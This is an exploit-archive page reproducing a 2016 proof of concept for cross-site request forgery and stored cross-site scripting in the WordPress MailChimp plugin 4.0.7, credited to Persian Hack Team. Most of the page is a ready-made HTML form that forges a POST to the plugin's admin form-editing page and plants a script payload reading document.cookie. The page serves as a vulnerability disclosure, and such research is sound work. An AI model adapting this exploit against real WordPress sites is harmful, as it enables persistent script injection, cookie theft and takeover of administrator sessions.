Home / os / winmobile

WordPress MailChimp 4.0.7 Cross Site Request Forgery / Cross Site Scripting

Posted on 21 November 2016

######################
# Exploit Title : WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/plugins/mailchimp-for-wp/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 4.0.7
# Date: 2016/11/19
######################
#
# PoC:
# I would like to disclose CSRF and stored XSS vulnerability in Wordpress plugin MailChimp 4.0.7.
# Demo Construction : http://persian-team.ir/showthread.php?tid=192
# The Code for CSRF.html is :

<form action="http://localhost/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" method="POST">

Title:<input type="text" name="mc4wp_form[name]" size="30" value="For Testing" id="title" spellcheck="true" autocomplete="off" placeholder="Enter the title of your sign-up form" style="line-height: initial;" >
<input type="submit" style="display: none; " />
<input type="hidden" name="_mc4wp_action" value="edit_form" />
<input type="hidden" name="mc4wp_form_id" value="60" />
<input type="hidden" id="_mc4wp_nonce" name="_mc4wp_nonce" value="ad1a3e81af" />
<input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" />

<h2>Form Fields</h2>

<textarea class="widefat" cols="160" rows="20" id="mc4wp-form-content" name="mc4wp_form[content]" placeholder="Enter the HTML code for your form fields.." autocomplete="false" autocorrect="false" autocapitalize="false" spellcheck="false">

<script>alert(document.cookie)</script><p>

</textarea>

<input type="hidden" id="required-fields" name="mc4wp_form[settings][required_fields]" value="" />

<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" /></p>

</form>

#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################

 

TOP

Malware :

Exploits :